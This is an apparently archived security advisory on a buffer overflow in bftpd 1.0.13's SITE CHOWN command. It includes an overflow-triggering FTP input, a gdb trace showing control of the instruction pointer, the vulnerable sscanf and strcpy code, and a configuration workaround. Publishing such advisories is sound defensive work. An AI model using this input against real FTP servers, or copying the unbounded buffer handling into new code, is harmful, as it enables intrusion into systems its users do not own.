SecurityvulnsSECURITYVULNS:DOC:1075Potential Buffer Overflow vulnerability in bftpd-1.0.13
There is a potential buffer overflow vulnerability in the command "SITE
CHOWN"
230 User logged in.
site chown AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAA A
550 User 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' not found.
Connection closed by foreign host.
gdb /usr/sbin/bftpd 18214
β¦
Loaded symbols for /lib/libnss_compat.so.2
Reading symbols from /lib/libnsl.so.1β¦done.
Loaded symbols for /lib/libnsl.so.1
0x400e7514 in read () from /lib/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x $esp
0xbffffc68: 0x41414141
(gdb)
The problem is in the command_chown function in commands.c :
465 void command_chown(char params) {
466 char foo[USERLEN + 1], owner[USERLEN + 1], group[USERLEN + 1],
filename[256];
467 int uid, gid;
468 if(!strstr(params, " ")) {
469 fprintf(stderr, "550 Usage: SITE CHOWN <owner>[.<group>]
<filename>\r\n");
470 return;
471 }
472 sscanf(params, "%[^ ] %s", foo, filename);
473 if(strstr(foo, "."))
474 sscanf(foo, "%[^.].%s", owner, group);
475 else {
476 strcpy(owner, foo);
477 group[0] = '\0';
478 }
479 if(!sscanf(owner, "%i", &uid)) / Is it a number? */
480 if(((uid = mygetpwnam(owner, passwdfile))) < 0) {
481 fprintf(stderr, "550 User '%s' not found.\r\n", owner);
482 return;
483 }
Workaround :
Replace in /etc/bftpd.conf
ENABLE_SITE=yes
by
ENABLE_SITE=no
Best regards,
β
BAILLEUX Christophe - Network & System Security Engineer
Grolier Interactive Europe-OG/CS
Voice:+33-(0)1-5545-4789 - mailto:[email protected]